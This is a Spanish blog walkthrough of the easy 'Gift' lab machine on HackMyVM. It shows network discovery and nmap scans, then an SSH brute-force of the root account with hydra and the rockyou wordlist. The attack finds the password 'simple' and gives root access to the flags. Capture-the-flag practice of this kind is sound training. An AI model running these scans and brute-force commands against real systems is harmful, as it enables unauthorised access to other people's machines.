Gift
Comenzamos el blog resolviendo la primera máquina easy subida a la plataforma de HackMyVM. El creador nos indica en la descripción que es “very easy”, un “regalo”, lo comprobaremos… 😁
Reconocimiento de Puertos
Comenzamos averiguando la IP de la máquina víctima:
❯ sudo arp-scan -l | grep "PCS"
192.168.0.25 08:00:27:c7:3f:a9 PCS Systemtechnik GmbH
Ahora realizamos el reconocimiento de puertos abiertos:
❯ sudo nmap -p- -sS --min-rate 5000 --open -Pn -vvv -n 192.168.0.25
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
Tenemos dos puertos abiertos, el puerto 22 (SSH) y el puerto 80 (HTTP).
Realizamos un escaneo más avanzado para obtener más información sobre estos puertos.
❯ nmap -sCV -p22,80 192.168.0.25
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
| 256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_ 256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open http nginx
|_http-title: Site doesn't have a title (text/html).
Comprobamos qué contenido muestra el puerto 80:
❯ curl -L http://192.168.0.25
Dont Overthink. Really, Its simple.
<!-- Trust me -->
No parece ir la cosa por ahí, así que según esa pista trataremos de seguir por el otro puerto, SSH
Fuerza bruta
Aplicaremos fuerza bruta sobre el usuario root por SSH:
❯ hydra -l root 192.168.0.25 -P /usr/share/wordlists/rockyou.txt ssh
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 14344223 to do in 1343:06h, 16 active
[22][ssh] host: 192.168.0.25 login: root password: simple
BINGO, tenemos acceso vía SSH como root
ssh root@192.168.0.25
IM AN SSH SERVER
gift:~# ls
root.txt user.txt
Y ahí tenemos las 2 flags, con las que concluimos esta primera máquina.